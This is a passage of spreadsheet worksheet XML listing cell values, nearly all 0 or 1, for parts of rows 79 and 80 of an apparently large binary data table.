      <c r="KC79">
        <v>0</v>
      </c>
      <c r="KD79">
        <v>0</v>
      </c>
      <c r="KE79">
        <v>0</v>
      </c>
      <c r="KF79">
        <v>0</v>
      </c>
      <c r="KG79">
        <v>0</v>
      </c>
      <c r="KH79">
        <v>1</v>
      </c>
      <c r="KI79">
        <v>1</v>
      </c>
      <c r="KJ79">
        <v>0</v>
      </c>
      <c r="KK79">
        <v>0</v>
      </c>
      <c r="KL79">
        <v>0</v>
      </c>
      <c r="KM79">
        <v>0</v>
      </c>
      <c r="KN79">
        <v>0</v>
      </c>
      <c r="KO79">
        <v>0</v>
      </c>
      <c r="KP79">
        <v>0</v>
      </c>
      <c r="KQ79">
        <v>0</v>
      </c>
      <c r="KR79">
        <v>0</v>
      </c>
      <c r="KS79">
        <v>0</v>
      </c>
      <c r="KT79">
        <v>0</v>
      </c>
      <c r="KU79">
        <v>1</v>
      </c>
      <c r="KV79">
        <v>0</v>
      </c>
      <c r="KW79">
        <v>0</v>
      </c>
      <c r="KX79">
        <v>0</v>
      </c>
      <c r="KY79">
        <v>0</v>
      </c>
      <c r="KZ79">
        <v>0</v>
      </c>
      <c r="LA79">
        <v>0</v>
      </c>
      <c r="LB79">
        <v>0</v>
      </c>
      <c r="LC79">
        <v>0</v>
      </c>
      <c r="LD79">
        <v>1</v>
      </c>
      <c r="LE79">
        <v>0</v>
      </c>
      <c r="LF79">
        <v>0</v>
      </c>
      <c r="LG79">
        <v>0</v>
      </c>
      <c r="LH79">
        <v>0</v>
      </c>
      <c r="LI79">
        <v>1</v>
      </c>
      <c r="LJ79">
        <v>0</v>
      </c>
      <c r="LK79">
        <v>0</v>
      </c>
      <c r="LL79">
        <v>0</v>
      </c>
      <c r="LM79">
        <v>0</v>
      </c>
      <c r="LN79">
        <v>0</v>
      </c>
      <c r="LO79">
        <v>0</v>
      </c>
      <c r="LP79">
        <v>0</v>
      </c>
      <c r="LQ79">
        <v>0</v>
      </c>
      <c r="LR79">
        <v>0</v>
      </c>
      <c r="LS79">
        <v>0</v>
      </c>
      <c r="LT79">
        <v>0</v>
      </c>
      <c r="LU79">
        <v>0</v>
      </c>
      <c r="LV79">
        <v>0</v>
      </c>
      <c r="LW79">
        <v>0</v>
      </c>
      <c r="LX79">
        <v>0</v>
      </c>
      <c r="LY79">
        <v>0</v>
      </c>
      <c r="LZ79">
        <v>1</v>
      </c>
      <c r="MA79">
        <v>0</v>
      </c>
      <c r="MB79">
        <v>1</v>
      </c>
      <c r="MC79">
        <v>0</v>
      </c>
      <c r="MD79">
        <v>0</v>
      </c>
      <c r="ME79">
        <v>0</v>
      </c>
      <c r="MF79">
        <v>0</v>
      </c>
      <c r="MG79">
        <v>0</v>
      </c>
      <c r="MH79">
        <v>0</v>
      </c>
      <c r="MI79">
        <v>0</v>
      </c>
      <c r="MJ79">
        <v>0</v>
      </c>
      <c r="MK79">
        <v>0</v>
      </c>
      <c r="ML79">
        <v>0</v>
      </c>
      <c r="MM79">
        <v>0</v>
      </c>
      <c r="MN79">
        <v>0</v>
      </c>
      <c r="MO79">
        <v>0</v>
      </c>
      <c r="MP79">
        <v>0</v>
      </c>
      <c r="MQ79">
        <v>0</v>
      </c>
      <c r="MR79">
        <v>0</v>
      </c>
      <c r="MS79">
        <v>1</v>
      </c>
      <c r="MT79">
        <v>0</v>
      </c>
      <c r="MU79">
        <v>0</v>
      </c>
      <c r="MV79">
        <v>0</v>
      </c>
      <c r="MW79">
        <v>0</v>
      </c>
      <c r="MX79">
        <v>0</v>
      </c>
      <c r="MY79">
        <v>0</v>
      </c>
      <c r="MZ79">
        <v>0</v>
      </c>
      <c r="NA79">
        <v>0</v>
      </c>
      <c r="NB79">
        <v>0</v>
      </c>
      <c r="NC79">
        <v>0</v>
      </c>
      <c r="ND79">
        <v>0</v>
      </c>
      <c r="NE79">
        <v>0</v>
      </c>
      <c r="NF79">
        <v>0</v>
      </c>
      <c r="NG79">
        <v>0</v>
      </c>
      <c r="NH79">
        <v>0</v>
      </c>
      <c r="NI79">
        <v>1</v>
      </c>
      <c r="NJ79">
        <v>0</v>
      </c>
      <c r="NK79">
        <v>0</v>
      </c>
      <c r="NL79">
        <v>0</v>
      </c>
      <c r="NM79">
        <v>0</v>
      </c>
      <c r="NN79">
        <v>0</v>
      </c>
      <c r="NO79">
        <v>0</v>
      </c>
      <c r="NP79">
        <v>0</v>
      </c>
      <c r="NQ79">
        <v>0</v>
      </c>
      <c r="NR79">
        <v>0</v>
      </c>
      <c r="NS79">
        <v>0</v>
      </c>
      <c r="NT79">
        <v>0</v>
      </c>
      <c r="NU79">
        <v>0</v>
      </c>
      <c r="NV79">
        <v>0</v>
      </c>
      <c r="NW79">
        <v>0</v>
      </c>
      <c r="NX79">
        <v>0</v>
      </c>
      <c r="NY79">
        <v>0</v>
      </c>
      <c r="NZ79">
        <v>0</v>
      </c>
      <c r="OA79">
        <v>0</v>
      </c>
      <c r="OB79">
        <v>0</v>
      </c>
      <c r="OC79">
        <v>0</v>
      </c>
      <c r="OD79">
        <v>0</v>
      </c>
      <c r="OE79">
        <v>0</v>
      </c>
      <c r="OF79">
        <v>0</v>
      </c>
      <c r="OG79">
        <v>0</v>
      </c>
      <c r="OH79">
        <v>0</v>
      </c>
      <c r="OI79">
        <v>0</v>
      </c>
      <c r="OJ79">
        <v>0</v>
      </c>
      <c r="OK79">
        <v>0</v>
      </c>
      <c r="OL79">
        <v>0</v>
      </c>
      <c r="OM79">
        <v>0</v>
      </c>
      <c r="ON79">
        <v>0</v>
      </c>
      <c r="OO79">
        <v>0</v>
      </c>
      <c r="OP79">
        <v>0</v>
      </c>
      <c r="OQ79">
        <v>0</v>
      </c>
      <c r="OR79">
        <v>0</v>
      </c>
      <c r="OS79">
        <v>0</v>
      </c>
      <c r="OT79">
        <v>0</v>
      </c>
      <c r="OU79">
        <v>0</v>
      </c>
      <c r="OV79">
        <v>0</v>
      </c>
      <c r="OW79">
        <v>0</v>
      </c>
      <c r="OX79">
        <v>0</v>
      </c>
      <c r="OY79">
        <v>0</v>
      </c>
      <c r="OZ79">
        <v>0</v>
      </c>
      <c r="PA79">
        <v>0</v>
      </c>
      <c r="PB79">
        <v>0</v>
      </c>
      <c r="PC79">
        <v>0</v>
      </c>
      <c r="PD79">
        <v>0</v>
      </c>
      <c r="PE79">
        <v>0</v>
      </c>
      <c r="PF79">
        <v>0</v>
      </c>
      <c r="PG79">
        <v>1</v>
      </c>
      <c r="PH79">
        <v>0</v>
      </c>
      <c r="PI79">
        <v>0</v>
      </c>
      <c r="PJ79">
        <v>0</v>
      </c>
      <c r="PK79">
        <v>0</v>
      </c>
      <c r="PL79">
        <v>0</v>
      </c>
      <c r="PM79">
        <v>1</v>
      </c>
      <c r="PN79">
        <v>0</v>
      </c>
      <c r="PO79">
        <v>0</v>
      </c>
      <c r="PP79">
        <v>0</v>
      </c>
      <c r="PQ79">
        <v>0</v>
      </c>
      <c r="PR79">
        <v>1</v>
      </c>
      <c r="PS79">
        <v>0</v>
      </c>
      <c r="PT79">
        <v>0</v>
      </c>
      <c r="PU79">
        <v>0</v>
      </c>
      <c r="PV79">
        <v>0</v>
      </c>
      <c r="PW79">
        <v>0</v>
      </c>
      <c r="PX79">
        <v>0</v>
      </c>
      <c r="PY79">
        <v>0</v>
      </c>
      <c r="PZ79">
        <v>0</v>
      </c>
      <c r="QA79">
        <v>0</v>
      </c>
      <c r="QB79">
        <v>0</v>
      </c>
      <c r="QC79">
        <v>0</v>
      </c>
      <c r="QD79">
        <v>0</v>
      </c>
      <c r="QE79">
        <v>0</v>
      </c>
      <c r="QF79">
        <v>0</v>
      </c>
      <c r="QG79">
        <v>0</v>
      </c>
      <c r="QH79">
        <v>0</v>
      </c>
      <c r="QI79">
        <v>0</v>
      </c>
      <c r="QJ79">
        <v>0</v>
      </c>
      <c r="QK79">
        <v>0</v>
      </c>
      <c r="QL79">
        <v>0</v>
      </c>
      <c r="QM79">
        <v>0</v>
      </c>
      <c r="QN79">
        <v>0</v>
      </c>
      <c r="QO79">
        <v>0</v>
      </c>
      <c r="QP79">
        <v>0</v>
      </c>
      <c r="QQ79">
        <v>0</v>
      </c>
      <c r="QR79">
        <v>0</v>
      </c>
      <c r="QS79">
        <v>1</v>
      </c>
      <c r="QT79">
        <v>0</v>
      </c>
      <c r="QU79">
        <v>0</v>
      </c>
      <c r="QV79">
        <v>0</v>
      </c>
      <c r="QW79">
        <v>0</v>
      </c>
      <c r="QX79">
        <v>0</v>
      </c>
      <c r="QY79">
        <v>0</v>
      </c>
      <c r="QZ79">
        <v>0</v>
      </c>
      <c r="RA79">
        <v>0</v>
      </c>
      <c r="RB79">
        <v>0</v>
      </c>
      <c r="RC79">
        <v>0</v>
      </c>
      <c r="RD79">
        <v>0</v>
      </c>
      <c r="RE79">
        <v>0</v>
      </c>
      <c r="RF79">
        <v>0</v>
      </c>
      <c r="RG79">
        <v>0</v>
      </c>
      <c r="RH79">
        <v>0</v>
      </c>
      <c r="RI79">
        <v>0</v>
      </c>
      <c r="RJ79">
        <v>0</v>
      </c>
      <c r="RK79">
        <v>0</v>
      </c>
      <c r="RL79">
        <v>0</v>
      </c>
      <c r="RM79">
        <v>0</v>
      </c>
      <c r="RN79">
        <v>0</v>
      </c>
      <c r="RO79">
        <v>0</v>
      </c>
      <c r="RP79">
        <v>0</v>
      </c>
      <c r="RQ79">
        <v>0</v>
      </c>
      <c r="RR79">
        <v>0</v>
      </c>
      <c r="RS79">
        <v>0</v>
      </c>
      <c r="RT79">
        <v>0</v>
      </c>
      <c r="RU79">
        <v>0</v>
      </c>
      <c r="RV79">
        <v>0</v>
      </c>
      <c r="RW79">
        <v>0</v>
      </c>
      <c r="RX79">
        <v>0</v>
      </c>
      <c r="RY79">
        <v>0</v>
      </c>
      <c r="RZ79">
        <v>0</v>
      </c>
      <c r="SA79">
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A80" s="6" t="s">
        <v>3256</v>
      </c>
      <c r="B80">
        <v>6</v>
      </c>
      <c r="C80">
        <v>0</v>
      </c>
      <c r="D80">
        <v>0</v>
      </c>
      <c r="E80">
        <v>0</v>
      </c>
      <c r="F80">
        <v>0</v>
      </c>
      <c r="G80">
        <v>0</v>
      </c>
      <c r="H80">
        <v>0</v>
      </c>
      <c r="I80">
        <v>0</v>
      </c>
      <c r="J80">
        <v>0</v>
      </c>
      <c r="K80">
        <v>0</v>
      </c>
      <c r="L80">
        <v>0</v>
      </c>
      <c r="M80">
        <v>0</v>
      </c>
      <c r="N80">
        <v>0</v>
      </c>
      <c r="O80">
        <v>0</v>
      </c>
      <c r="P80">
        <v>0</v>
      </c>
      <c r="Q80">
        <v>0</v>
      </c>
      <c r="R80">
        <v>0</v>
      </c>
      <c r="S80">
        <v>0</v>
      </c>
      <c r="T80">
        <v>0</v>
      </c>
      <c r="U80">
        <v>0</v>
      </c>
      <c r="V80">
        <v>0</v>
      </c>
      <c r="W80">
        <v>0</v>
      </c>
      <c r="X80">
        <v>0</v>
      </c>
      <c r="Y80">
        <v>0</v>
      </c>
      <c r="Z80">
        <v>0</v>
      </c>
      <c r="AA80">
        <v>0</v>
      </c>
      <c r="AB80">
        <v>0</v>
      </c>
      <c r="AC80">
        <v>0</v>
      </c>
      <c r="AD80">
        <v>0</v>
      </c>
      <c r="AE80">
        <v>0</v>
      </c>
      <c r="AF80">
        <v>0</v>
      </c>
      <c r="AG80">
        <v>0</v>
      </c>
      <c r="AH80">
        <v>0</v>
      </c>
      <c r="AI80">
        <v>0</v>
      </c>
      <c r="AJ80">
        <v>0</v>
      </c>
      <c r="AK80">
        <v>0</v>
      </c>
      <c r="AL80">
        <v>0</v>
      </c>
      <c r="AM80">
        <v>0</v>
      </c>
      <c r="AN80">
        <v>0</v>
      </c>
      <c r="AO80">
        <v>0</v>
      </c>
      <c r="AP80">
        <v>0</v>
      </c>
      <c r="AQ80">
        <v>0</v>
      </c>
      <c r="AR80">
        <v>0</v>
      </c>
      <c r="AS80">
        <v>0</v>
      </c>
      <c r="AT80">
        <v>0</v>
      </c>
      <c r="AU80">
        <v>0</v>
      </c>
      <c r="AV80">
        <v>0</v>
      </c>
      <c r="AW80">
        <v>0</v>
      </c>
      <c r="AX80">
        <v>0</v>
      </c>
      <c r="AY80">
        <v>0</v>
      </c>
      <c r="AZ80">
        <v>0</v>
      </c>
      <c r="BA80">
        <v>0</v>
      </c>
      <c r="BB80">
        <v>0</v>
      </c>
      <c r="BC80">
        <v>0</v>
      </c>
      <c r="BD80">
        <v>0</v>
      </c>
      <c r="BE80">
        <v>0</v>
      </c>
      <c r="BF80">
        <v>0</v>
      </c>
      <c r="BG80">
        <v>0</v>
      </c>
      <c r="BH80">
        <v>0</v>
      </c>
      <c r="BI80">
        <v>0</v>
      </c>
      <c r="BJ80">
        <v>0</v>
      </c>
      <c r="BK80">
        <v>0</v>
      </c>
      <c r="BL80">
        <v>0</v>
      </c>
      <c r="BM80">
        <v>1</v>
      </c>
      <c r="BN80">
        <v>0</v>
      </c>
      <c r="BO80">
        <v>0</v>
      </c>
      <c r="BP80">
        <v>0</v>
      </c>
      <c r="BQ80">
        <v>0</v>
      </c>
      <c r="BR80">
        <v>0</v>
      </c>
      <c r="BS80">
        <v>0</v>
      </c>
      <c r="BT80">
        <v>0</v>
      </c>
      <c r="BU80">
        <v>0</v>
      </c>
      <c r="BV80">
        <v>0</v>
      </c>
      <c r="BW80">
        <v>0</v>
      </c>
      <c r="BX80">
        <v>0</v>
      </c>
      <c r="BY80">
        <v>0</v>
      </c>
      <c r="BZ80">
        <v>0</v>
      </c>
      <c r="CA80">
        <v>0</v>
      </c>
      <c r="CB80">
        <v>0</v>
      </c>
      <c r="CC80">
        <v>0</v>
      </c>
      <c r="CD80">
        <v>0</v>
      </c>
      <c r="CE80">
        <v>0</v>
      </c>
      <c r="CF80">
        <v>0</v>
      </c>
      <c r="CG80">
        <v>0</v>
      </c>
      <c r="CH80">
        <v>0</v>
      </c>
      <c r="CI80">
        <v>0</v>
      </c>
      <c r="CJ80">
        <v>0</v>
      </c>
      <c r="CK80">
        <v>0</v>
      </c>
      <c r="CL80">
        <v>0</v>
      </c>
      <c r="CM80">
        <v>0</v>
      </c>
      <c r="CN80">
        <v>0</v>
      </c>
      <c r="CO80">
        <v>0</v>
      </c>
      <c r="CP80">
        <v>0</v>
      </c>
      <c r="CQ80">
        <v>0</v>
      </c>
      <c r="CR80">
        <v>0</v>
      </c>
      <c r="CS80">
        <v>0</v>
      </c>
      <c r="CT80">
        <v>0</v>
      </c>
      <c r="CU80">
        <v>0</v>
      </c>
      <c r="CV80">
        <v>0</v>
      </c>
      <c r="CW80">
        <v>0</v>
      </c>
      <c r="CX80">
        <v>0</v>
      </c>
      <c r="CY80">
        <v>0</v>
      </c>
      <c r="CZ80">
        <v>0</v>
      </c>
      <c r="DA80">
        <v>0</v>
      </c>
      <c r="DB80">
        <v>0</v>
      </c>
      <c r="DC80">
        <v>0</v>
      </c>
      <c r="DD80">
        <v>0</v>
      </c>
      <c r="DE80">
        <v>0</v>
      </c>
      <c r="DF80">
        <v>0</v>
      </c>
      <c r="DG80">
        <v>0</v>
      </c>
      <c r="DH80">
        <v>0</v>
      </c>
      <c r="DI80">
        <v>0</v>
      </c>
      <c r="DJ80">
        <v>0</v>
      </c>
      <c r="DK80">
        <v>0</v>
      </c>
      <c r="DL80">
        <v>0</v>
      </c>
      <c r="DM80">
        <v>0</v>
      </c>
      <c r="DN80">
        <v>0</v>
      </c>
      <c r="DO80">
        <v>0</v>
      </c>
      <c r="DP80">
        <v>0</v>
      </c>
      <c r="DQ80">
        <v>0</v>
      </c>
      <c r="DR80">
        <v>0</v>
      </c>
      <c r="DS80">
        <v>0</v>
      </c>
      <c r="DT80">
        <v>0</v>
      </c>
      <c r="DU80">
        <v>0</v>
      </c>
      <c r="DV80">
        <v>0</v>
      </c>
      <c r="DW80">
        <v>0</v>
      </c>
      <c r="DX80">
        <v>0</v>
      </c>
      <c r="DY80">
        <v>0</v>
      </c>
      <c r="DZ80">
        <v>0</v>
      </c>
      <c r="EA80">
        <v>0</v>
      </c>
      <c r="EB80">
        <v>0</v>
      </c>
      <c r="EC80">
        <v>0</v>
      </c>
      <c r="ED80">
        <v>0</v>
      </c>
      <c r="EE80">
        <v>0</v>
      </c>
      <c r="EF80">
        <v>0</v>
      </c>
      <c r="EG80">
        <v>0</v>
      </c>
      <c r="EH80">
        <v>0</v>
      </c>
      <c r="EI80">
        <v>0</v>
      </c>
      <c r="EJ80">
        <v>0</v>
      </c>
      <c r="EK80">
        <v>0</v>
      </c>
      <c r="EL80">
        <v>0</v>
      </c>
      <c r="EM80">
        <v>0</v>
      </c>
      <c r="EN80">
        <v>0</v>
      </c>
      <c r="EO80">
        <v>0</v>
      </c>
      <c r="EP80">
        <v>0</v>
      </c>
      <c r="EQ80">
        <v>0</v>
      </c>
      <c r="ER80">
        <v>0</v>
      </c>
      <c r="ES80">
        <v>0</v>
      </c>
      <c r="ET80">
        <v>0</v>
      </c>
      <c r="EU80">
        <v>0</v>
      </c>
      <c r="EV80">
        <v>0</v>
      </c>
      <c r="EW80">
        <v>0</v>
      </c>
      <c r="EX80">
        <v>0</v>
      </c>
      <c r="EY80">
        <v>0</v>
      </c>
      <c r="EZ80">
        <v>0</v>
      </c>
      <c r="FA80">
        <v>0</v>
      </c>
      <c r="FB80">
        <v>0</v>
      </c>
      <c r="FC80">
        <v>0</v>
      </c>
      <c r="FD80">
        <v>0</v>
      </c>
      <c r="FE80">
        <v>0</v>
      </c>
      <c r="FF80">
        <v>0</v>
      </c>
      <c r="FG80">
        <v>0</v>
      </c>
      <c r="FH80">
        <v>0</v>
      </c>
      <c r="FI80">
        <v>0</v>
      </c>
      <c r="FJ80">
        <v>0</v>
      </c>
      <c r="FK80">
        <v>0</v>
      </c>
      <c r="FL80">
        <v>0</v>
      </c>
      <c r="FM80">
        <v>0</v>
      </c>
      <c r="FN80">
        <v>0</v>
      </c>
      <c r="FO80">
        <v>0</v>
      </c>
      <c r="FP80">
        <v>0</v>
      </c>
      <c r="FQ80">
        <v>0</v>
      </c>
      <c r="FR80">
        <v>1</v>
      </c>
      <c r="FS80">
        <v>0</v>
      </c>
      <c r="FT80">
        <v>0</v>
      </c>
      <c r="FU80">
        <v>0</v>
      </c>
      <c r="FV80">
        <v>0</v>
      </c>
      <c r="FW80">
        <v>0</v>
      </c>
      <c r="FX80">
        <v>0</v>
      </c>
      <c r="FY80">
        <v>0</v>
      </c>
      <c r="FZ80">
        <v>0</v>
      </c>
      <c r="GA80">
        <v>0</v>
      </c>
      <c r="GB80">
        <v>0</v>
      </c>
      <c r="GC80">
        <v>0</v>
      </c>
      <c r="GD80">
        <v>0</v>
      </c>
      <c r="GE80">
        <v>0</v>
      </c>
      <c r="GF80">
        <v>0</v>
      </c>
      <c r="GG80">
        <v>0</v>
      </c>
      <c r="GH80">
        <v>0</v>
      </c>
      <c r="GI80">
        <v>0</v>
      </c>
      <c r="GJ80">
        <v>0</v>
      </c>
      <c r="GK80">
        <v>0</v>
      </c>
      <c r="GL80">
        <v>0</v>
      </c>
      <c r="GM80">
        <v>0</v>
      </c>
      <c r="GN80">
        <v>0</v>
      </c>
      <c r="GO80">
        <v>0</v>
      </c>
      <c r="GP80">
        <v>0</v>
      </c>
      <c r="GQ80">
        <v>0</v>
      </c>
      <c r="GR80">
        <v>0</v>
      </c>
      <c r="GS80">
        <v>0</v>
      </c>
      <c r="GT80">
        <v>0</v>
      </c>
      <c r="GU80">
        <v>0</v>
      </c>
      <c r="GV80">
        <v>0</v>
      </c>
      <c r="GW80">
        <v>1</v>
      </c>
      <c r="GX80">
        <v>0</v>
      </c>
      <c r="GY80">
        <v>0</v>
      </c>
      <c r="GZ80">
        <v>0</v>
      </c>
      <c r="HA80">
        <v>0</v>
      </c>
      <c r="HB80">
        <v>0</v>
      </c>
      <c r="HC80">
        <v>0</v>
      </c>
      <c r="HD80">
        <v>0</v>
      </c>
      <c r="HE80">
        <v>0</v>
      </c>
      <c r="HF80">
        <v>0</v>
      </c>
      <c r="HG80">
        <v>0</v>
      </c>
      <c r="HH80">
        <v>0</v>
      </c>
      <c r="HI80">
        <v>0</v>
      </c>
      <c r="HJ80">
        <v>0</v>
      </c>
      <c r="HK80">
        <v>0</v>
      </c>
      <c r="HL80">
        <v>0</v>
      </c>
      <c r="HM80">
        <v>0</v>
      </c>
      <c r="HN80">
        <v>0</v>
      </c>
      <c r="HO80">
        <v>0</v>
      </c>
      <c r="HP80">
        <v>0</v>
      </c>
      <c r="HQ80">
        <v>0</v>
      </c>
      <c r="HR80">
        <v>0</v>
      </c>
      <c r="HS80">
        <v>0</v>
      </c>
      <c r="HT80">
        <v>0</v>
      </c>
      <c r="HU80">
        <v>0</v>
      </c>
      <c r="HV80">
        <v>0</v>
      </c>
      <c r="HW80">
        <v>0</v>
      </c>
      <c r="HX80">
        <v>0</v>
      </c>
      <c r="HY80">
        <v>0</v>
      </c>
      <c r="HZ80">
        <v>0</v>
      </c>
      <c r="IA80">
        <v>0</v>
      </c>
      <c r="IB80">
        <v>0</v>
      </c>
      <c r="IC80">
        <v>0</v>
      </c>
      <c r="ID80">
        <v>0</v>
      </c>
      <c r="IE80">
        <v>0</v>
      </c>
      <c r="IF80">
        <v>0</v>
      </c>
      <c r="IG80">
        <v>0</v>
      </c>
      <c r="IH80">
        <v>0</v>
      </c>
      <c r="II80">
        <v>0</v>
      </c>
      <c r="IJ80">
        <v>0</v>
      </c>
      <c r="IK80">
        <v>0</v>
      </c>
      <c r="IL80">
        <v>0</v>
      </c>
      <c r="IM80">
        <v>0</v>
      </c>
      <c r="IN80">
        <v>0</v>
      </c>
      <c r="IO80">
        <v>0</v>
      </c>
      <c r="IP80">
        <v>0</v>
      </c>
      <c r="IQ80">
        <v>0</v>
      </c>
      <c r="IR80">
        <v>0</v>
      </c>
      <c r="IS80">
        <v>0</v>
      </c>
      <c r="IT80">
        <v>0</v>
      </c>
      <c r="IU80">
        <v>0</v>
      </c>
      <c r="IV80">
        <v>0</v>
      </c>
      <c r="IW80">
        <v>0</v>
      </c>
      <c r="IX80">
        <v>0</v>
      </c>
      <c r="IY80">
        <v>0</v>
      </c>
      <c r="IZ80">
        <v>0</v>
      </c>
      <c r="JA80">
        <v>0</v>
      </c>
      <c r="JB80">
        <v>0</v>
      </c>
      <c r="JC80">
        <v>0</v>
      </c>
      <c r="JD80">
        <v>0</v>
      </c>
      <c r="JE80">
        <v>0</v>
      </c>
      <c r="JF80">
        <v>0</v>
      </c>
      <c r="JG80">
        <v>0</v>
      </c>
      <c r="JH80">
        <v>0</v>
      </c>
      <c r="JI80">
        <v>0</v>
      </c>
      <c r="JJ80">
        <v>0</v>
      </c>
      <c r="JK80">
        <v>0</v>
      </c>
      <c r="JL80">
        <v>0</v>
      </c>
      <c r="JM80">
        <v>0</v>
      </c>
      <c r="JN80">
        <v>0</v>
      </c>
      <c r="JO80">
        <v>0</v>
      </c>
      <c r="JP80">
        <v>0</v>
      </c>
      <c r="JQ80">
        <v>0</v>
      </c>
      <c r="JR80">
        <v>0</v>
      </c>
      <c r="JS80">
        <v>1</v>
      </c>
      <c r="JT80">
        <v>0</v>
      </c>
      <c r="JU80">
        <v>0</v>
      </c>
      <c r="JV80">
        <v>0</v>
      </c>
      <c r="JW80">
        <v>0</v>
      </c>
      <c r="JX80">
        <v>0</v>
      </c>
      <c r="JY80">
        <v>0</v>
      </c>
      <c r="JZ80">
        <v>0</v>
      </c>
      <c r="KA80">
        <v>0</v>
      </c>
      <c r="KB80">
        <v>0</v>
      </c>
      <c r="KC80">
        <v>1</v>
      </c>
      <c r="KD80">
        <v>0</v>
      </c>
      <c r="KE80">
        <v>0</v>
      </c>
      <c r="KF80">
        <v>0</v>
      </c>
      <c r="KG80">
        <v>0</v>
      </c>
      <c r="KH80">
        <v>0</v>
      </c>
      <c r="KI80">
        <v>0</v>
      </c>
      <c r="KJ80">
        <v>0</v>
      </c>
      <c r="KK80">
        <v>0</v>
      </c>
      <c r="KL80">
        <v>0</v>
      </c>
      <c r="KM80">
        <v>0</v>
      </c>
      <c r="KN80">
        <v>0</v>
      </c>
      <c r="KO80">
        <v>0</v>
      </c>
      <c r="KP80">
        <v>0</v>
      </c>
      <c r="KQ80">
        <v>0</v>
      </c>
      <c r="KR80">
        <v>0</v>
      </c>
      <c r="KS80">
        <v>0</v>
      </c>
      <c r="KT80">
        <v>0</v>
      </c>
      <c r="KU80">
        <v>0</v>
      </c>
      <c r="KV80">
        <v>0</v>
      </c>
      <c r="KW80">
        <v>0</v>
      </c>
      <c r="KX80">
        <v>0</v>
      </c>
      <c r="KY80">
        <v>0</v>
      </c>
      <c r="KZ80">
        <v>0</v>
      </c>
      <c r="LA80">
        <v>0</v>
      </c>
      <c r="LB80">
        <v>0</v>
      </c>
      <c r="LC80">
        <v>0</v>
      </c>
      <c r="LD80">
        <v>0</v>
      </c>
      <c r="LE80">
        <v>0</v>
      </c>
      <c r="LF80">
        <v>0</v>
      </c>
      <c r="LG80">
        <v>0</v>
      </c>
      <c r="LH80">
        <v>0</v>
      </c>
      <c r="LI80">
        <v>0</v>
      </c>
      <c r="LJ80">
        <v>0</v>
      </c>
      <c r="LK80">
        <v>0</v>
      </c>
      <c r="LL80">
        <v>0</v>
      </c>
      <c r="LM80">
        <v>0</v>
      </c>
      <c r="LN80">
        <v>0</v>
      </c>
      <c r="LO80">
        <v>0</v>
      </c>
      <c r="LP80">
        <v>1</v>
      </c>
      <c r="LQ80">
        <v>0</v>
      </c>
      <c r="LR80">
        <v>0</v>
      </c>
      <c r="LS80">
        <v>0</v>
      </c>
      <c r="LT80">
        <v>0</v>
      </c>
      <c r="LU80">
        <v>0</v>
      </c>
      <c r="LV80">
        <v>0</v>
      </c>
      <c r="LW80">
        <v>0</v>
      </c>
      <c r="LX80">
        <v>0</v>
      </c>
      <c r="LY80">
        <v>0</v>
      </c>
      <c r="LZ80">
        <v>0</v>
      </c>
      <c r="MA80">
        <v>0</v>
      </c>
      <c r="MB80">
        <v>0</v>
      </c>
      <c r="MC80">
        <v>0</v>
      </c>
      <c r="MD80">
        <v>0</v>
      </c>
      <c r="ME80">
        <v>0</v>
      </c>
      <c r="MF80">
        <v>0</v>
      </c>
      <c r="MG80">
        <v>0</v>
      </c>
      <c r="MH80">
        <v>0</v>
      </c>
      <c r="MI80">
        <v>0</v>
      </c>
      <c r="MJ80">
        <v>0</v>
      </c>
      <c r="MK80">
        <v>0</v>
      </c>
      <c r="ML80">
        <v>0</v>
      </c>
      <c r="MM80">
        <v>0</v>
      </c>
      <c r="MN80">
        <v>0</v>
      </c>
      <c r="MO80">
        <v>0</v>
      </c>
      <c r="MP80">
        <v>0</v>
      </c>
      <c r="MQ80">
        <v>0</v>
      </c>
      <c r="MR80">
        <v>0</v>
      </c>
      <c r="MS80">
        <v>0</v>
      </c>
      <c r="MT80">
        <v>0</v>
      </c>
      <c r="MU80">
        <v>0</v>
      </c>
      <c r="MV80">
        <v>0</v>
      </c>
      <c r="MW80">
        <v>0</v>
      </c>
      <c r="MX80">
        <v>0</v>
      </c>
      <c r="MY80">
        <v>0</v>
      </c>
      <c r="MZ80">
        <v>0</v>
      </c>
      <c r="NA80">
        <v>0</v>
      </c>
      <c r="NB80">
        <v>0</v>
      </c>
      <c r="NC80">
        <v>0</v>
      </c>
      <c r="ND80">
        <v>0</v>
      </c>
      <c r="NE80">
        <v>0</v>
      </c>
      <c r="NF80">
        <v>0</v>
      </c>
      <c r="NG80">
        <v>0</v>
      </c>
      <c r="NH80">
        <v>0</v>
      </c>
      <c r="NI80">
        <v>0</v>
      </c>
      <c r="NJ80">
        <v>0</v>
      </c>
      <c r="NK80">
        <v>0</v>
      </c>
      <c r="NL80">
        <v>0</v>
      </c>
      <c r="NM80">
        <v>0</v>
      </c>
      <c r="NN80">
        <v>0</v>
      </c>
      <c r="NO80">
        <v>0</v>
      </c>
      <c r="NP80">
        <v>0</v>
      </c>
      <c r="NQ80">
        <v>0</v>
      </c>
      <c r="NR80">
        <v>0</v>
      </c>
      <c r="NS80">
        <v>0</v>
      </c>
      <c r="NT80">
        <v>0</v>
      </c>
      <c r="NU80">
        <v>0</v>
      </c>
      <c r="NV80">
        <v>0</v>
      </c>
      <c r="NW80">
        <v>0</v>
      </c>
      <c r="NX80">
        <v>0</v>
      </c>
      <c r="NY80">
        <v>0</v>
      </c>
      <c r="NZ80">
        <v>0</v>
      </c>
      <c r="OA80">
        <v>0</v>
      </c>
      <c r="OB80">
        <v>0</v>
      </c>
      <c r="OC80">
        <v>0</v>
      </c>
      <c r="OD80">
        <v>0</v>
      </c>
      <c r="OE80">
        <v>0</v>
      </c>
      <c r="OF80">
        <v>0</v>
      </c>
      <c r="OG80">
        <v>0</v>
      </c>
      <c r="OH80">
        <v>0</v>
      </c>
      <c r="OI80">
        <v>0</v>
      </c>
      <c r="OJ80">
        <v>0</v>
      </c>
      <c r="OK80">
        <v>0</v>
      </c>
      <c r="OL80">
        <v>0</v>
      </c>
      <c r="OM80">
        <v>0</v>
      </c>
      <c r="ON80">
        <v>0</v>
      </c>
      <c r="OO80">
        <v>0</v>
      </c>
      <c r="OP80">
        <v>0</v>
      </c>
      <c r="OQ80">
        <v>0</v>
      </c>
      <c r="OR80">
        <v>0</v>
      </c>
      <c r="OS80">
        <v>0</v>
      </c>
      <c r="OT80">
        <v>0</v>
      </c>
      <c r="OU80">
        <v>0</v>
      </c>
      <c r="OV80">
        <v>0</v>
      </c>
      <c r="OW80">
        <v>0</v>
      </c>
      <c r="OX80">
        <v>0</v>
      </c>
